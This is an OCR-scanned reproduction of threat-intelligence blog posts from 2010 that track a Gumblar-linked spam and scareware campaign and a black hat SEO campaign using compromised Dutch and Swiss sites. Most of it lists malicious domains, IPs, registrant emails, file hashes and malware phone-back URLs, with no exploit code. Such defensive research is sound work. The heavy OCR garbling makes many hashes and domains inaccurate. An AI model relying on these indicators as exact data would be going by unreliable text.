2. Click on "My Account" - "My Profile" at 

https://www. macys. com/my info/pro file/index, ognc 

3. Uncheck the box Receive email notification when 
statements are available to view online and when payments 
are due. 

4. Click on "Update Profile" 

5. Expect the change to take place in 3 days 

©2009 macys.com Inc., 685 Market Street, Suite 800, San 
Francisco, CA 94105. AH rights reserved. " 

Compared to previous campaigns, the directory structure 
(fast fluxed :8080/index.php?pid=10; maliciousurl.ru 



/QWERTY.js; maliciousurl.ru/ODBC.js; LAN.js; 

Access.js; End User, js etc. ) of this one remains virtually 
the same, depending, of course, on the angle you choose 
for dissecting it. 
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Sample campaign structure: 

- musicsgeneva.com /x.html - " PLEASE WAITING 4 
SECOND... " 

- opus22.org /x.html - “ PLEASE WAITING 4 SECOND... “ 

- shamelessfreegift.com /x.html - " PLEASE WAITING 4 
SECOND... " 

- physicianschoiceonline.com /x.htm - " PLEASE 
WAITING 4 SECOND... " 

- baymediagroup .com:8080/index.php?pid=10 - 

client-side exploits -188.165.95.133; 

188.165.192.106; 

91.121.108.61; 94.23.60.106; 178.32.5.233 - Email: 
fb@bigmailbox. ru 

- hoopdotami.cz .cc/scanner5/?afid=24 - 

188.72.192.229 - sea re ware monetization 

- Detection rate: 

antivirus _24.exe - [3]Trojan. Win32.FraudPack.berq - 
Result: 16/42 (38.1 %) 


File size: 166912 bytes 

MD5...: b3cd297c654d3be52ffeb5f6a5ffl 3b4 

SHA1..: bae889dd8ac7b22ec5f5649d6e0c073c8e2119d5 
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Upon execution, the sample phones back to: 

httpsstarss.in /httpss/v=40 &step=2 &hostid= - 

188.72.226.154 - Email: stevieksbaiz@hotmaii.com 

httpstatsconfig.com /getfile.php?r= - 204.12.226.173 - 
Email: httpstatsconfig. com@evoprivacy. com 

Responding to 204.12.226.173 are also: 

nsl.desktopsecurity2010ltd.com - Email: 
sixtakidlt2@hotmail. com 

ns2. desktopsecurity201 Oltd. com 

www. desktopsecurity201 Oltd. com 

httpstatsconfig. com 

nsl. h ttpsta tscon fig. com 

ns2. h ttpsta tsconfig. com 

desktopsecuritycorp. com 

nsl. desktopsecuritycorp. com 

ns2. desktopsecuritycorp. com 


Domains using the same name server, 
nsl.freedomen.info - 209.85.99.32 - Email: 
maii@vetaxa. com 

adsonlineinc.com - 66.96.239.86 

picmonde.com - 94.228.220.93 

bonblogger.com - 94.228.220.93 

h2fastpornpics.com - 94.228.220.93 

ceiebsfinectpics.com - 94.228.209.133 - Email: 
temp. for. loan@gmail. com 

celebsfreeimages.com - 94.228.209.134 - Email: 
hannigey233@hotmaii. com 

picindividuals.com - 94.228.220.93 
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picbioggerprojet.com - 94.228.220.93 
h ttpsstarss. in 

hippocounter.info - 96.9.177.21 
genesisbeta.net - 94.228.220.94 
Name servers of notice: 

nsl.getyourdns.com -194.79.88.121 
ns2.getyourdns.com - 77.68.52.52 
ns3.getyourdns.com - 87.98.149.171 


ns4.getyourdns.com - 66.185.162.248 

nsl.instantdnsserver.com - 194.79.88.121 - Email: 
depot@infotorrent. ru 

ns2.instantdnsserver.com - 77.68.52.52 
ns3.instantdnsserver.com - 87.98.149.171 
ns4.instantdnsserver.com - 66.185.162.248 
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Client-side exploits serving domains part of the campaign: 
aquaticwrap.ru - Email: vibes@freenetbox.ru 
aroundpiano.ru - Email: vibes@freenetbox.ru 
baybear.ru - Email: vibes@freenetbox.ru 
baymediagroup.com - Email: fb@bigmailbox.ru 
bayjail.ru - Email: bushy@bigmailbox.ru 
betaguy.ru - Email: vibes@freenetbox.ru 
biockoctopus.ru - Email: semi@freenetbox.ru 
budgetdude.ru - Email: totem@freenetbox.ru 
chaoticice.ru - Email: vibes@freenetbox.ru 
clannut.ru - Email: totem@freenetbox.ru 
clockledge.ru - Email: totem@freenetbox.ru 
coldboy.ru - Email: totem@freenetbox.ru 



countryme.ru - Email: totem@freenetbox.ru 
dayemail.ru - Email: totem@freenetbox.ru 
diseasednoodle.ru - Email: vibes@freenetbox.ru 
discountprowatch.com - Email: bike@fastermail. 
dyehill.ru - Email: angles@fastermail.ru 
easychurch.ru - Email: vibes@freenetbox.ru 
economypoet.ru - Email: semi@freenetbox.ru 
envirodollars.ru - Email: vibes@freenetbox.ru 
forhomessaie.ru - Email: dull@freemailbox.ru 
galacticstall.ru - Email: vibes@freenetbox.ru 
getyourdns.com - Email: fb@bigmailbox.ru 
hairyartist.ru - Email: vibes@freenetbox.ru 
lonelyzero.ru - Email: vibes@freenetbox.ru 
lovingmug.ru - Email: vibes@freenetbox.ru 
iowermatch.ru - Email: vibes@freenetbox.ru 
luckyfan.ru - Email: vibes@freenetbox.ru 
malepad.ru - Email: semi@freenetbox.ru 
matchsearch.ru - Email: semi@freenetbox.ru 
microlightning.ru - Email: vibes@freenetbox.ru 
mindbat.ru - Email: semi@freenetbox.ru 



meaipoets.ru - Email: totem@freenetbox.ru 
nutcountry.ru - Email: dying@qx8.ru 
obscurewax.ru - Email: vibes@freenetbox.ru 
oceanobject.ru - Email: semi@freenetbox.ru 
parkperson.ru - Email: semi@freenetbox.ru 
penarea.ru - Email: dying@qx8.ru 
ponybug.ru - Email: dying@qx8.ru 
pocketbloke.ru - Email: angles@fastermail.ru 
programability.ru - Email: dying@qx8.ru 
rancideye.ru - Email: vibes@freenetbox.ru 
rawscent.ru - Email: vibes@freenetbox.ru 
recordsquare.ru - Email: totem@freenetbox.ru 
rescuedtoiiet.ru - Email: vibes@freenetbox.ru 
riotassistance.ru - Email: angles@fastermail.ru 
scarletpole.ru - Email: vibes@freenetbox.ru 
secondgain.ru - Email: vibes@freenetbox.ru 
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shortrib.ru - Email: vibes@freenetbox.ru 
slaveperfume.ru - Email: totem@freenetbox.ru 
sodacells.ru - Email: dying@qx8.ru 



smelldrip.ru - Email: totem@freenetbox.ru 

starvingarctic.ru - Email: vibes@freenetbox.ru 

stagepause.ru - Email: totem@freenetbox.ru 

sweatymilk.ru - Email: vibes@freenetbox.ru 

tartonion.ru - Email: vibes@freenetbox.ru 

tunemug.ru - Email: tips@freenetbox.ru 

wearyratio.ru - Email: vibes@freenetbox.ru 

yummyeyes.ru - Email: vibes@freenetbox.ru 

UPDATED: Thursday , August 12, 2010: Historical OSINT 
for client-side exploit serving domains part of Gum- 

blar's campaigns for April/May 2010 using 
hostdnssite.com (Email: cop@qx8.ru) name server: 

bestdarkman.info - Email: wwww@qx8.ru 

bestwebciub.info - Email: asleep@5mx.ru 

buyfootjoy.info - Email: mellow@5mx.ru 

carswebnet.info - Email: mynah@freenetbox.ru 

cityrealtimes, info - Email: asieep@5mx.ru 

clandarkguide.info - Email: meilow@5mx.ru 

clandarksky.info - Email: wwww@qx8.ru 

darkangelcam.info - Email: mellow@5mx.ru 

darkbluecoast.info - Email: wwww@qx8.ru 



darksidenetwork.info - Email: mellow@5mx.ru 
digitaljoyworld.info - Email: mellow@5mx.ru 
eroomsite.info - Email: feint@qx8.ru 
esunsite.info - Email: wwww@qx8.ru 
extrafreeweb.info - Email: mynah@freenetbox.ru 
feedandstream.info - Email: mynah@freenetbox.ru 
gloomyblack.info - Email: wwww@qx8.ru 
homesweetrv.info - Email: mynah@freenetbox.ru 
indiawebnet.info - Email: mynah@freenetbox.ru 
joyiifein.info - Email: mellow@5mx.ru 
joysportsworld.info - Email: mellow@5mx.ru 
justroomate.info - Email: feint@qx8.ru 
kenjoyworld.info - Email: mellow@5mx.ru 
learnwebguide.info - Email: mynah@freenetbox.ru 
luxurygenuine.info - Email: asleep@5mx.ru 
myfeedsite.info - Email: feint@qx8.ru 
newsuntour.info - Email: wwww@qx8.ru 
oneroomhome.info - Email: feint@qx8.ru 
realshoponline.info - Email: asleep@5mx.ru 
redsunpark.info - Email: feint@qx8.ru 



roomstoretexas.info - Email: feint@qx8.ru 
suncoastatlas.info - Email: feint@qx8.ru 
sunstarvideo.info - Email: feint@qx8.ru 
supersunbeds.info - Email: feint@qx8.ru 
superwebworld.info - Email: asleep@5mx.ru 
sweetpeapots.info - Email: mynah@freenetbox.ru 
sweetteenzone.info - Email: mynah@freenetbox.ru 
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thedarkwaters.info - Email: wwww@qx8.ru 
thejoydiet.info - Email: mellow@5mx.ru 
therealclamp.info - Email: drum@maillife.ru 
thesunchaser.info - Email: wwww@qx8.ru 
thesweetchiid.info - Email: mynah@freenetbox.ru 
theultimateweb.info - Email: asieep@5mx.ru 
theyellowsun.info - Email: feint@qx8.ru 
webguidetv.info - Email: asleep@5mx.ru 
webnetenglish.info - Email: mynah@freenetbox.ru 
yourprintroom.info - Email: feint@qx8.ru 
yoursweetteen.info - Email: mynah@freenetbox.ru 


UPDATED: Friday, August 13, 2010: 

The use of Yahoo Groups is still ongoing. Sample URL: 

groups.yahoo .com/group/nfidcsyi/message which 
includes a link to perfectpillcool .com:8080. 

The campaign is ongoing, updates will be posted as soon as 
new developments emerge. 

This post has been reproduced from [4]Dancho 
Danchev's blog. Follow him [5]on Twitter. 
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1. htto://ddanchev.bio as oot.com/2010/07/soamvertised- 
amazon-verif v- vou-email.html 

2. htto.Y/ddanchev.bio as oot.com/2010/07/dissectina-xerox- 
workcentre-oro-scanned.html 

3. 

http://www.virustotal.com/analisis/912608f55fba98cb03a 13 

114ceea4a503d0fd4cc6ca5bab345792b5 7788431 lf-12813 

45777 

4. htto.Y/ddanchev.bio as oot.com/ 

5. http://twitter.com/danchodanchev 
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Dissecting a Sea re ware-Serving Black Hat SEO 
Campaign Using Compromised .NL/.CH Sites 


















(2010-08-13 17:09) 

Over the past week, I've been tracking - among the 
countless number of campaigns currently in process of 
getting 

profiled/taken care of internally - a blackhat SEO campaign 
that's persistently compromising legitimate sites within 
small ISPs in the Netherlands and Switzerland, for 
scareware-serving purposes. 

Although this beneath the radar targeting approach is 
nothing new, it once again emphasizes on a well proven 

mentality within the cybercrime ecosystem - collectively the 
hundreds of thousands of low profile sites, if well 

poisoned with bogus/timely/relevant blackhat SEO content, 
can outpace the hijacked traffic from a high profile site due 
to the shorter time frame it would take for the the 
administrators to clean it up/ quicker community members' 

reaction based on prioritization due to the importance of 
the site. 

What's particularly interesting about the campaign, is the 
fact that the redirectors/scareware domains were 

previously parked within our "dear friends at AS31252, 

STARNET-AS StarNet Moldova. Go through related posts 
on STARNET-AS StarNet Moldova: 

• [ljKoobface Redirectors and Scareware Campaigns 
Now Hosted in Moldova 

• [2]Dissecting Koobface Gang's Latest Face book 
Spreading Campaign 
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• [3]Koobface Gang Responds to the "10 Things You 
Didn't Know About the Koobface Gang Post" 

• [4] From the Koobface Gang with Scareware Serving 
Compromised Sites 

Let's dissect the campaign, expose the complete portfolio of 
seareware/redirector domains, emphasize on the 

monetization vector and how this blackhat SEO campaign is 
using the same scareware affiliate network like the one 
campaigns launched through Gumblar's infrastructure 

([5]Spamvertised Best Buy, Macy's, Evite and Target 
Themed Scareware/Exploits Serving Campaign) 

continue using. 

Once the self.location.href = condition is met, the 
following redirectors take place, until the user is exposed to 
the ubiquitous "You're infected" screen: 

- dotyuzcifl.ru/liq/?st= - 200.63.44.211 - Email: 
kireev@ravermaii.com (NS: nsl.freemobiledns.mobi Email: 
akornl 022@gmail. com) 

- errgxhxzerr.co.cc/r/feed.php?k= - 200.63.44.211, 
AS27716, ASEVELOZ - Email: andrew_bush52@hotmail.com 

- errgxhxzerr.co.cc/tube/?k= 

- errgxhxzerr.co.cc/r/sss.php 


- www4.protection-guard89.co.cc - 74.118.193.81, 
AS46664 - Email: abc.emm@gmail.com 


- wwwl.virus-detection50.co.cc/?p=p52 - 

94.228.220.117, A547869, NETROUTING-AS - Email: 
a be. emm@gmail. com 

- Detection rate: 

packupdate9 _289.exe - 

[6]Win32/TrojanDownloader.FakeAlert.AEY - 6/ 42 (14.3 

%) 

MD5 : 3e4920aa3ff24db64372ae96854f3f02 

SHA1 : 75bcb6acf5ff65269bfc5f685e5d03688b8blade 

SHA256: 

7272f889520cdl dl 898ccd91 flbOl 835cf53f06b452041 baae 
0336796ff09fd7 

Responding to 94.228.220.117, A547869, NETROUTING-AS 
are also the following domains: 

wwwl.virus-detection50.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

wwwl.virus-detection51.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

wwwl.virus-detection52.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

wwwl.virus-detection53.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

wwwl.virus-detection54.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 



wwwl.virus-detection55.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

wwwl.virus-detection56.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

wwwl.virus-detection57.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

wwwl.virus-detection58.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

wwwl.virus-detection59.co.cc/?p=p52 - Email: 
a be. emm@gmail. com 

www2.mypersonalshield70.in - Email: 
gkook@checkjemail. nl 

www 2. my persona/shield 71. in - Email: 
gkook@checkjemaU. nl 

605 


£ 


www2.mypersonaishieid72.in - Email: 
gkook@checkjemaU. nl 

It gets even more interesting, and cybercrime ecosystem- 
friendly, when we see that one of the scareware redirector 
domains, has been registered with the same email as the 
scareware domain redirector used in the monetization 

vector of Gumblar's campaigns. 

The currently used uramozat.cz.ee /scannerl0/?afid=76 

- 195.16.88.62, AS50109, H0STLIFE-A5 WIBO PROJECT 


LLC - Email: ydeconspi@nice-4u.com is registered using the 
same email as the recently used hoopdotami.cz 

.cc/scanner5/?afid=24 -188.72.192.229 - Email: 
ydeconspi@nice-4u.com from the "[7]Spamvertised Best 
Buy, Macy's, Evite and Target Themed 
Scareware/Exploits Serving Campaign". 

This centralization of monetization networks ultimately 
serves best the security industry and law enforcement, 

and remains a trend rather than a fad. 

Responding to 195.16.88.62 are also the following affiliate 
redirector domains: 

sulphomihin.cz.cc - Email: ydeconspi@nice-4u.com 
suppcorfoke.cz.cc - Email: ydeconspi@nice-4u.com 
swinumiobzua.cz.ee - Email: ydeconspi@nice-4u.com 
taitretarjus.ez.ee - Email: ydeconspi@nice-4u.com 
talinighge.ez.ee - Email: ydeconspi@nice-4u.com 
tangmomawigg.ez.ee - Email: ydeconspi@nice-4u.com 
taniverwea.ez.ee - Email: ydeconspi@nice-4u.com 
tedroidragin.ez.ee - Email: ydeconspi@nice-4u.com 
tifucacel.cz.ee - Email: ydeconspi@nice-4u.com 
ungelacoc.cz.ee - Email: ydeconspi@nice-4u.com 
unriprazzhaif.ez.ee - Email: ydeconspi@nice-4u.com 



uramozat.cz.cc - Email: ydeconspi@nice-4u.com 

voehicorneu.cz.ee - Email: ydeconspi@nice-4u.com 

voihuavino.cz.ee - Email: ydeconspi@nice-4u.com 

voldcafuri.cz.ee - Email: ydeconspi@nice-4u.com 

weineitronty.ez.ee - Email: ydeconspi@nice-4u.com 

wintotersstai.cz.ee - Email: ydeconspi@nice-4u.com 

worddreamelpa.ez.ee - Email: ydeconspi@nice-4u.com 

wordrochosom.cz.ee - Email: ydeconspi@nice-4u.com 

xboxunechin.cz.ee - Email: ydeconspi@nice-4u.com 

ydeconspi.cz.ee - Email: ydeconspi@nice-4u.com 

zilrebeima.ez.ee - Email: ydeconspi@nice-4u.com 

zukavito.ez.ee - Email: ydeconspi@nice-4u.com 

• [ 8 ] Complete list of URLs for the compromised 
Dutch sites (NOW CLEAN) hosted atA56461, MFNX MFN - 
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Metromedia Fiber Network 

Complete list of the URLs for compromised sites 
(CURRENTLYACTIVE) hosted at AS15547, TV52NET-NETPLUS 

Servicing cable-network customer in CFI. 

abitasion.ch /iiiucpUWAeima 
abitasion.ch /HOeUSbRtm/ 



abmontage.ch /73NJub8iWea/ 
absteam.ch /UfHZI8Qm7/ 
accueUetpartagesuisse.ch /Wb VcOfiHlabe/ 
accueiletpartagesuisse.ch /Wbytpauohcjk/ 
adikt-a.ch ZisisAuMOImXW/ 
adikt-a.ch /islWcgUV7L/ 
a dsite. ch /I A ULixdSo WmA/ 
adumas.ch /QVxaomZ7er 
aemo-valais.ch /ualagow/ 
aerobic-chablais. ch /\YMy3iAejmiq/ 
aerobic-chablais. ch / IYuM W8yHJ/ 
a-fauchere.ch /rU8alutON/ 
agpinstallations. ch /WAoxnHauvyUi/ 
agpinstallations.ch /WA wANoXv9rek/ 
alayra.ch ZufgMxORjbNz9i/ 
alex-xxxl.ch /u9VUyo9hw/ 
alpirama.ch /A0Sc3lu/ 
alterfamiliae.ch /RgauIMVZ/ 
ametys.ch /IZ2eblxoL3tSN/ 
ametys.ch /IZbAaYy/ 



amis-orgue-moudon.ch /WulatdWMbRSg/ 
amis-orgue-moudon.ch /WuYUoH3/ 
apf-hev-fr.ch /drkoUqjx/ 
artdidier.ch /vZkR7ap2gQiAU/ 
artefax.ch /u8oApWua/ 
artefax.ch /u8qrYoi8ASh/ 
artisanatbramoisien. ch /jRVAEWyXqLsM/ 
artisane.ch /Scg3IEv/ 
artisan-fondeur.ch /RX0y9OdUu/ 
artist-e.ch /_]8WfilEa/ 
asb-coaching.ch /uJWOldHeuai'/ 
a telier-bois. ch /skjun 0elUgM8/ 
ateliercube.ch /3bqNHnLy/ 
attoufoula-al-baria. ch /scWZHiblemAqr/ 
autoecole-sion.ch /kuWcUM3yn9xgo/ 
a ux-doigts-de-fee. ch /eoo VapJN WcuHx/ 
auxpetitsbois.ch /80x\aoWeydbc7/ 
avgf.ch /xr3t0uvanegb/ 
avmep.ch /niyW3RHiaoE/ 
a vmep. ch /nizXOdum W/ 



avosbagages.ch 7ebaAuynxel2L/ 
avta.ch /ZuOVoixA/ 
banques-assurances. ch /WEeyt7iUYL/ 
batibois.ch /hgAbavx/ 
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batibois.ch /hghkyUN09/ 
bconseiis.ch /tAiUzJVn/ 
bc-production.ch /9XupRmibE/ 
bdelfolie.ch /ushj20miJW9wu/ 
bdelfolie.ch /usiUomaYfWeN/ 
becoval.ch /a VUqW9xYbp/ 
bedat-conseiis.ch /AUyYRtuh WrpA/ 
be I fid. ch /ftRbtg!3/ 
beliodeiiedonne.ch ZoXOkUuN/ 
bellodelledonne.ch 7oXoNgekf7i/ 
bestwear.ch 7jOiyeJ3v/ 



bienecrire.ch /YAE9ldiakvy/ 
biocave.ch /AuhuwoAUxOI3W/ 
birman.ch /Z7MoeVXgAafL/ 
blanchival.ch /ANabQIgkOzeO/ 
blanchival.ch /ANJjlQgHb/ 
bnbmorel.ch /yfE3AyWoQx87 
bonnes-occases.ch /HlYMhcE/ 
bouquins.ch /IWHOdAa/ 
cafepsy.ch /ZoiAcIWIRM/ 
calzolarorocco.ch /9a8aYRjlrW/ 
camping-sedunum.ch /SvvMQjsem/ 
canadulce.ch /wullMriaN/ 
canadulce.ch /wuQYryJ/ 
carrgeiger.ch /ehsVy2uXxoAWE/ 
carte-menu.ch /JQinNyA/ 
castalie.ch /cq3xeyWmjaf/ 
catherineritter.ch /AdUJiRq/ 
catherineritter.ch /AdUqRAiSnNsyv/ 
ca vedegoubing. ch /ERNzcu9iagdo/ 



cave-des-chevalieres.ch /WuunyOq/ 
celinerenaud.ch /Qj7dHcLo/ 
celinerena ud. ch /QjZoUyaJV 
centre-autos.ch /INUYRuWnA/ 
cere-sa.ch ZlyEHdVqAlYbXL/ 
cere-sa. ch /lykn WJr/ 
cgt.ch /egAaVUfne/ 
chalets-for-sale.ch /SaNXWcvU/ 
chavaz-archi.ch /8iAZxEaJ/ 
chavaz-archi.ch /8iQOjlS/ 
cretillons.ch /ianeZc2/ 

Responding to 200.63.44.211 (the original [9]redirector 
domains dotyuzcifl.ru; errgxhxzerr.co.cc), A527716, 
ASEVELOZ Eveloz are the remaining domains part of the 
seareware/redirection/Fake Adobe Player (tube/Adobe _ 

Flash _ _Player.exe) campaign. 

- Detection rate: 

Adobe _ Flash _ _Player.exe - 

[10 ] Heuristic. Be ha vesLike. Win32. Suspicious. H -11/42 (26.2 
%) 

MD5 : 8a10909c487a739e85028al9ale898dc 
SHA1 : d9f7d78fe245f8df04fa398835b52d5a2c2d6af7 
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SHA256: 

63befe 78a 7895a8efc6d893491 d8f77ef8adalcd52d5625874 
90a 79f29b65336 

- Upon execution phones back to: 

qualattice.com - 64.20.63.58 - Email: 
trough@mobiletonight. com 

jaxcage.net - 91.188.60.233 ’ [11JAS6851 , BKCNET "SIA" 
IZZl - Email: deiee@easteroffers.com mybubblebean.com 

- 85.234.190.47, [12] AS6851, BKCNET "SIA" IZZl - Email: 
place@popupquote.com freejaxbird.net - 77.78.239.42 - 
Email: delee@easteroffers.com 

07tqqwem.ru - Email: pishkov@rbcmail.ru 

0qhe7y6o.ru - Email: pishkov@rbcmail.ru 

0st44x7z.ru - Email: stroganov@mail.ru 

0w6scx6a.ru - Email: goncharov@rapworid.com 

20xzpzga.ru - Email: danilov@boatnerd.com 

23qjmdic.ru - Email: lebedev@rapworld.com 

28iue5ri.ru - Email: kireev@bgay.com 

28jnbuak.ru - Email: kiriliov@ravermail.com 

2poaxz3k.ru - Email: alekseev@land.ru 

2tmo2ba2.ru - Email: kustov@remixer.com 

30zcz8ot.ru - Email: slabkov@bigmailbox.net 



32iafdnp.ru - Email: erohin@intimatefire.com 
3a0stbqe.ru - Email: golodnikov@blida.info 
3jruf6nc.ru - Email: taranov@inorbit.com 
40ktc2tn.ru - Email: antonov@insurer.com 
4hp2ag6c.ru - Email: beiov@kidrock.com 
4mausx2w.ru - Email: lavrov@biackcity.net 
4y8pqcby.ru - Email: pokatiiov@reaityagent.com 
5eqq3sgj.ru - Email: abakumov@smtp.ru 
5gsco2w5.ru - Email: davidov@bikermail.com 
5q4eyd2w.ru - Email: stepanov@pop3.ru 
5znhff2s.ru - Email: kalinin@boarderzone.com 
6ojj8sks.ru - Email: patralov@bigheavyworld.com 
6pgsqndh.ru - Email: baklanov@mail333.com 
83qndvnj.ru - Email: taranov@relapsecult.com 
868r5e0b.ru - Email: udalov@rastamall.com 
8n7pnyyr.ru - Email: patraiov@front.ru 
8reclame.ru - Email: kirikov@billssite.com 
atyyyopg.ru - Email: viktorov@bikerheaven.net 
azaamdwo.ru - Email: samsonov@bikermail.com 
bvo62o0i.ru - Email: kirillov@rastamall.com 



c28xd2ck.ru - Email: luzgin@front.ru 
cf8sagkn.ru - Email: aiekseev@ratedx.net 
ckmdbrio.ru - Email: ulyanov@rapworld.com 
crosslinks-services.ru - Email: ekomasov@kidrock.com 
csokolom.ru - Email: kirikov@irow.com 
cw5k47ye.ru - Email: viktorov@bicycling.com 
duz5n2ca.ru - Email: beiov@bilissite.com 
dwunvuum.ru - Email: stepanov@pop3.ru 
ea7xh4vw.ru - Email: goncharov@repairman.com 
err39hxzerr.co.cc - Email: andrew_bush52@hotmail.com 
err3ghxzerr.co.cc - Email: andrew_bush52@hotmail.com 
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err5phxzerr.co.cc - Email: andrew_bush52@hotmail.com 
err61hxzerr.co.cc - Email: andrew_bush52@hotmail.com 
err6ehxzerr.co.cc - Email: andrew_bush52@hotmail.com 
err6jhxzerr.co.cc - Email: andrew_bush52@hotmail.com 
err8jhxzerr.co.cc - Email: andrew_bush52@hotmail.com 
err8whxzerr.co.cc - Email: andrew_bush52@hotmail.com 
errb9hxzerr.co.cc - Email: andrew_bush52@hotmail.com 
errbehxzerr.co.cc - Email: andrew_bush52@hotmail.com 



errbqhxzerr.co.cc - Email: andrew_bush52@hotmail.com 
errcihxzerr.co.ee - Email: andrew_bush52@hotmail.com 
errdhhxzerr.eo.ee - Email: andrew_bush52@hotmail.com 
errekhxzerr.eo.ee - Email: andrew_bush52@hotmail.com 
errfdhxzerr.eo.ee - Email: andrew_bush52@hotmail.com 
errgqhxzerr.eo.ee - Email: andrew_bush52@hotmail.com 
errgthxzerr.eo.ee - Email: andrew_bush52@hotmail.com 
errguhxzerr.eo.ee - Email: andrew_bush52@hotmail.com 
errgvhxzerr.eo.ee - Email: andrew_bush52@hotmail.com 
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f50rbdb8.ru - Email: samsonov@kidrock.com 
fbbktj2z.ru - Email: zhukov@kidrock.com 
fimpvs8t.ru - Email: zhuravlev@blackvault.com 
fppf2h28.ru - Email: danilov@pochta.ru 
gayq8rgx.ru - Email: kovalev@blackcity.net 
gea vdwal. info 
gerotal.info 

gztyue8w.ru - Email: kirillov@boatnerd.com 
h6poe6or.ru - Email: beglov@inorbit.com 


hc6zxms4.ru - Email: lebedev@intimatefire.com 
hem3oxjh.ru - Email: uiyanov@boarderzone.com 
hszwwvjq.ru - Email: kustov@fromru.com 
i2wv8rdm.ru - Email: shedrin@billssite.com 
i4nhjopf.ru - Email: antonov@fromru.com 
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i7in0b64.ru - Email: ulyanov@kinkyemail.com 
ihbkbzcm.ru - Email: abdulov@iname.com 
io0yfyc8.ru - Email: moichanov@repairman.com 
j6yeky7p.ru - Email: bazhenov@krovatka.su 
j7k6xze2.ru - Email: vasilev@pop3.ru 
jimm2rusru.ru - Email: kustov@rapworld.com 
jimm4fan09.ru - Email: antonov@blida.info 
jimmjimm895.ru - Email: kuznecov@insurer.com 
jimmkolesoru.ru - Email: naumov@boarderzone.com 
jimmonlineO.ru - Email: miheev@gmail.com 
jimmplum2.ru - Email: vishnevskiy@pop3.ru 
jimmthebestl.ru - Email: aleksandrov@blackcity.net 
jnano5gh.ru - Email: zhukov@realtyagent.com 
jokerjokk.ru - Email: beglov@blida.info 



kefpvbsi.ru - Email: kalinin@boarderzone.com 
kfgemaae.ru - Email: ulyanov@bigmailbox.net 
koliander.ru - Email: zaicev@insurer.com 
liononlinensd.ru - Email: nikitin@rastamaii.com 
lokipol.ru - Email: kirikov@bikerheaven.net 
mjbims7m.ru - Email: pishkov@ravermail.com 
mrtOzqcb.ru - Email: shedrin@pochtamt.ru 
mxek5t5g.ru - Email: beglov@repairman.com 
nesseiandeportai. info 
ni2m4kua.ru - Email: zhukov@bikermail.com 
nv8os6yt.ru - Email: kuznecov@mail.ru 
o3wg4sya.ru - Email: abakumov@bolbox.com 
ocggnaif.ru - Email: zaicev@iname.com 
ofz5qzgu.ru - Email: zaicev@ravermail.com 
oh7iumr7.ru - Email: belov@inorbit.com 
onlinefeeds.ru - Email: beglov@insurer.com 
onlinegearsd.ru - Email: luzgin@smtp.ru 
onlinejimmmovse.ru - Email: abakumov@realtyagent.com 
onlineonlkiok.ru - Email: kirillov@billssite.com 
pgvvua6j.ru - Email: goncharov@bicyciing.com 



pororkol.ru - Email: erohin@bikerider.com 
prc6t7z3.ru - Email: kirikov@pochtamt.ru 
psxdvOnr.ru - Email: zhukov@inbox.ru 
pvbsiy5y.ru - Email: komarov@kinkyemail.com 
q3ysg05s.ru - Email: golodnikov@insurer.com 
qbecqeOs.ru - Email: ulyanov@bicycling.com 
qec5beqn.ru - Email: morozov@pochta.ru 
qfnye2t7.ru - Email: bednyakov@irow.com 
qpsxdvOn.ru - Email: viktorov@blackcity.net 
rikosdhu.ru - Email: pokatilov@pisem.net 
ronaldknol.ru - Email: taranov@smtp.ru 
rs3gpd0m.ru - Email: alekseev@bicycledata.com 
rudjimmdjimm.ru - Email: alekseev@boarderzone.com 
s4gvhd35.ru - Email: lebedev@blackvault.com 
s748eop4.ru - Email: aleksandrov@repairman.com 
612 

sgivnnOt.ru - Email: volkov@repairman.com 
stpf6qpv.ru - Email: bednyakov@relapsecult.com 
sv4wmtxj.ru - Email: ivanov@bikerider.com 
t0a2afyq.ru - Email: ivanov@boatnerd.com 



t3tzynvj.ru - Email: bazhenov@rapstar.com 
trustincompanies.ru - Email: abdulov@insurer.com 
u5fyfzjt.ru - Email: polovov@rbcmail.ru 
ucf47vnu.ru - Email: abdulov@bikerider.com 
uplcash.com - Email: director@climbing-games.com 
v5w3xgzn.ru - Email: morozov@rbcmail.ru 
vgksry7k.ru - Email: vishnevskiy@land.ru 
w8iroomb.ru - Email: goiodnikov@pop3.ru 
x7p03g0j.ru - Email: kirikov@front.ru 
xni27ftd.ru - Email: timofeev@mail.ru 
xsd3id8t.ru - Email: kovalev@pochta.ru 
xthjrgxz.ru - Email: pokatilov@insurer.com 
xu44i03y.ru - Email: arhipov@insurer.com 
yiOewtmd.ru - Email: antonov@blackvault.com 
yp7o07nq.ru - Email: golodnikov@rbcmail.ru 
z26hggcb.ru - Email: pokatilov@fromru.com 
z656cvje.ru - Email: slabkov@boatnerd.com 
zsrd4xj5.ru - Email: kuznecov@iname.com 
zznks8fh.ru - Email: bulaev@registerednurses.com 
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Could we have a blackhat 5E0 campaign, without a 
Koobface gang connection? Appreciate my rhetoric. Parked 
at 

200.63.44.48, again within A527716, ASEVELOZ Eveloz are 
the following domains: 

35l3cv2oywwycrfzlyo3.com - Email: 
michaeitycoon@gmaii. com 

4idmcxlczdy52yh7rklb.com - Email: 
michaeltycoon(g)gmail. com 

56ml7zj047l0x6wm9v6y.com - Email: 
michaeltycoon(g)gmail. com 

8vsgzuu084e9i8ohl5nn.com - Email: 
michaeitycoon@gmaii. com 

aatyamikpgxp8h3ml7ky.com - Email: 
michaeltycoon(g)gmail. com 

bvzpvunifooe8t946d2p.com - Email: 
michaeitycoon@gmaii. com 

i905jzsht33cd4kfcqvh.com - Email: 
michaeltycoon(g)gmail. com 

jhn72w76khysuxdgj0bo.com - Email: 
michaeltycoon@gmail. com 

k78ju8lyzratna0c5r7m.com - Email: 
michaeltycoon(g)gmail. com 

Irbx4hzznbdmedfk4xrd.com - Email: 
michaeltycoon(g)gmail. com 


Isleepnzj784nid96prn.com - Email: 
michaeltycoon@gmail. com 

n0itv7fh7qscrfse3ili.com - Email: 
michaeltycoon@gmail. com 
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pdusxsiuedamjc83qipi.com - Email: 
michaeltycoon@gmail. com 

rabotaetpoiubomu.net - Email: 
michaeitycoon@gmaii. com 

t0vqred4itv4pmo488k9.com - Email: 
michaeitycoon@gmaii. com 

thmyb0s6se5febs0ghb8.com - Email: 
michaeitycoon@gmaii. com 

